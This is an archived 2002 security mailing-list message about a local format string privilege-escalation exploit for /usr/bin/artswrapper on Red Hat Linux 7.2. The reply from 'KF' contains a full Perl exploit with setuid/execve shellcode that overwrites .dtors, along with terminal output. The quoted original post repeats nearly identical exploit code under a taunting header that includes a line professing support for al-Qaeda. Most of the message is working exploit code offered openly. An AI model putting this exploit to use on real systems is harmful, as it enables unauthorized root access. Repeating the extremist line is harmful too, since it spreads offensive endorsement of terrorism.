Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

From: KF (dotslashat_private)
Date: Wed Jun 12 2002 - 22:24:39 PDT

  • Next message: KF: "Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT"

    Heh looks like I fell asleep on releasing this one... and it looks like the
    posted code was actually code from our labs (credit where its due
    please)...just so you are aware the issue is really in artsd which is NOT
    suid ... you should get a shell with your own privs... Heres where that code
    really came from....
    
    [root@ghetto dotslash]# artswrapper -a %x
    >> running as realtime process now (priority 50)
    Error while initializing the sound driver:
    unable to select 'bffffa40' style audio I/O
    [root@ghetto dotslash]# ls -al `which artswrapper`
    -rwsr-sr-x    1 root     root         4136 Sep  8  2001 /usr/bin/artswrapper
    [root@ghetto dotslash]# ls -al `which artsd`
    -rwxr-xr-x    1 root     root       115284 Sep  8  2001 /usr/bin/artsd
    [root@ghetto dotslash]# artsd -a %x
    Error while initializing the sound driver:
    unable to select 'bffffa80' style audio I/O
    
    
    [dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl
    #!/usr/bin/perl
    
    ## ---/ artswrapex.pl /------------------------------------------------
    ##
    ## /usr/bin/artswrapper local format string exploit
    ##   * tested on Red Hat Linux release 7.2 (Enigma)
    ##   * Jun 17 2002
    ##
    ## Author: stringz // thcat_private
    ##
    ## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
    ##
    ## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
    ##         obscure, jove, rachel, kevin, and all of my 2e2h friends.
    ##
    ## ---/ powered by pot /-----------------------------------------------
    
    # setuid + execve shellcode
    $kode =
      "\x31\xdb".                 # xor ebx, ebx
      "\xf7\xe3".                 # mul ebx
      "\xb0\x17".                 # mov al, 0x17
      "\xcd\x80".                 # int 0x80
      "\x31\xc0".                 # xor  eax, eax
      "\x99".                     # cdq
      "\x52".                     # push edx
      "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
      "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
      "\x89\xe3".                 # mov  ebx, esp
      "\x52".                     # push edx
      "\x53".                     # push ebx
      "\x89\xe1".                 # mov  ecx, esp
      "\xb0\x0b".                 # mov  al, 0x0b
      "\xcd\x80";                 # int  0x80
    
    $vuln    = "/usr/bin/artswrapper";
    $dtors   = 0x8049a7c + 4;;
    
    printf("\n-- /usr/bin/artswrapper local format string exploit\n");
    printf("-- stringz // thc\@drug.org\n\n");
    
    $ret_addr = 0xc0000000 - 4
        - (length($vuln) + 1)
        - (length($kode) + 1)
        ;
    
    undef(%ENV); $ENV{'1337'} = $kode;
    
    printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
    printf("bruteforcing distance (1 .. 300)\n");
    sleep(2);
    
    for (1 .. 300) {
        $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
        die("\x0a") if (system("$vuln -a $fmt_str"))
            =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
    }
    
    sub
    sw_fmtstr_create ($$$)
    {
        die("Incorrect number of arguments for sw_fmtstr_create")
            unless @_ == 3;
    
        my ($dest_addr, $ret_addr, $dist) = @_;
        my ($word, $qword) = (2, 8);
    
        # $dest_addr = where to write $ret_addr
        # $ret_addr  = where to return execution
        # $dist      = the calculated distance
    
        $tmp1  = (($ret_addr >> 16) & 0xffff);
        $tmp2  = $ret_addr & 0xffff;
    
        if ($tmp1 < $tmp2) {
            $high = $tmp1 - $qword;
            $low  = $tmp2 - $high - $qword;
    
            $dest_addr1 = pack('L', $dest_addr + $word);
            $dest_addr2 = pack('L', $dest_addr);
        }
        else {
            $high = $tmp2 - $qword;
            $low  = $tmp1 - $high - $qword;
    
            $dest_addr1 = pack('L', $dest_addr);
            $dest_addr2 = pack('L', $dest_addr + $word);
        }
    
        sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
                $dest_addr1, $dest_addr2, $high, $dist,
                $low, $dist + 1);
    }
    
    -KF
    
    
    ----- Original Message -----
    From: "kanix THE HACKER" <kanixat_private>
    To: <bugtraqat_private>; <vulnwatchat_private>;
    <vuln-devat_private>; <submissionsat_private>
    Sent: Saturday, July 06, 2002 3:45 PM
    Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
    
    
    > Greetings,
    >
    > This is a local exploit for a format string vulnerability in
    /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).
    >
    > Sincerely,
    >
    > kanix
    >
    
    
    ----------------------------------------------------------------------------
    ----
    
    
    > #!/usr/bin/perl
    >
    > ########################################################################
    > #
    > # fartsy.pl by kanix <kanixat_private>
    > # /usr/sbin/artswrapper <local format string exploit>
    > # Tested on Red Hat Linux release 7.2 (Enigma)
    > #
    > # Jul 6, 2002
    > #
    > # "the secret to creativity is knowing how to hide your sources."
    > # - Albert Einstein
    > #
    > # commentz, job offerz, flamez, etc. should be directed to my e-mail
    > # address -- I WILL SCHOOL YOU ALL.
    > #
    > # SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
    > # official supporter of the al-Qaeda Terrorist Network.
    > #
    > # BURN, BABY, BURN!!!
    > #
    > # I 0xc0ded this for fun and profit... and to get scene whorez. ;>
    > #
    > # This code is far from special - my mother could have written it,
    > # however, that is the extent of my ability.
    > #
    > # I can code sploits, but I know nothing of UNC file sharing! I'm
    > # still very 0x1337. I mean, I can code exploits, that's what makes
    > # you a hacker!
    > #
    > # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
    > # there are enuff retardz in the hacker scene already (LIKE ME ;>)!
    > #
    > # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
    > #         security.is, #hackphreak, teleh0r (fame seeking whore like
    > #         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
    > #         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
    > #
    > # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
    > #
    > # kanix: can some1 pleeze tell me about DNS cache poisoning?
    > #
    > ########################################################################
    >
    > $kode =
    >   "\x31\xdb".                 # xor ebx, ebx
    >   "\xf7\xe3".                 # mul ebx
    >   "\xb0\x17".                 # mov al, 0x17
    >   "\xcd\x80".                 # int 0x80
    >   "\x31\xc0".                 # xor  eax, eax
    >   "\x99".                     # cdq
    >   "\x52".                     # push edx
    >   "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
    >   "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
    >   "\x89\xe3".                 # mov  ebx, esp
    >   "\x52".                     # push edx
    >   "\x53".                     # push ebx
    >   "\x89\xe1".                 # mov  ecx, esp
    >   "\xb0\x0b".                 # mov  al, 0x0b
    >   "\xcd\x80";                 # int  0x80
    >
    > $vuln    = "/usr/bin/artswrapper";
    > $dtors   = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)
    >
    > printf("\n-- /usr/bin/artswrapper local format string exploit\n");
    > printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");
    >
    > $ret_addr = 0xc0000000 - 4
    >     - (length($vuln) + 1)
    >     - (length($kode) + 1)
    >     ;
    >
    > undef(%ENV); $ENV{'1337'} = $kode;
    >
    > printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
    > printf("bruteforcing distance (1 .. 300)\n");
    > sleep(2);
    >
    > for (1 .. 300) {
    >     $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    >     die("\x0a") if (system("$vuln -a $fmt_str"))
    >         =~ m/^(0|256|512|32512)$/;
    > }
    >
    > sub
    > sw_fmtstr_create ($$$)
    > {
    >     die("Incorrect number of arguments for sw_fmtstr_create")
    >         unless @_ == 3;
    >
    >     my ($dest_addr, $ret_addr, $dist) = @_;
    >     my ($word, $qword) = (2, 8);
    >
    >     $tmp1  = (($ret_addr >> 16) & 0xffff);
    >     $tmp2  = $ret_addr & 0xffff;
    >
    >     if ($tmp1 < $tmp2) {
    >         $high = $tmp1 - $qword;
    >         $low  = $tmp2 - $high - $qword;
    >
    >         $dest_addr1 = pack('L', $dest_addr + $word);
    >         $dest_addr2 = pack('L', $dest_addr);
    >     }
    >     else {
    >         $high = $tmp2 - $qword;
    >         $low  = $tmp1 - $high - $qword;
    >
    >         $dest_addr1 = pack('L', $dest_addr);
    >         $dest_addr2 = pack('L', $dest_addr + $word);
    >     }
    >
    >     sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
    >             $dest_addr1, $dest_addr2, $high, $dist,
    >             $low, $dist + 1);
    > }
    >
    



    This archive was generated by hypermail 2b30 : Mon Jul 08 2002 - 10:22:18 PDT